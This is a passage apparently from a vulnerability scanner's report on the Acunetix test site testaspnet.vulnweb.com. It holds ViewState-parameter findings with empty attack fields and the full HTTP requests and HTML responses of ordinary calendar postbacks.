style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8355&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAOYFlx9oIZGRkd%2Fitp7kchQsBJXr9A8x8Wj7rhC0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLRn7CbCwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2B0x5mlUb3bp8nMoAnmkFE9BiUvc
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:15 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAOYFlx9oIZGRkd/itp7kchQsBJXr9A8x8Wj7rhC0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLRn7CbCwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+0x5mlUb3bp8nMoAnmkFE9BiUvc" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:White" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8343&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCARIT3vdoIZGRkNFwJI0cS6lqxUi1ozTCZMUG6VoI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLLx5LdBALHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2ByaX16u3O%2BUC7XoFICcZVZTsJFp
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:35 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCARIT3vdoIZGRkNFwJI0cS6lqxUi1ozTCZMUG6VoI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLLx5LdBALHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+yaX16u3O+UC7XoFICcZVZTsJFp" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:White" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td 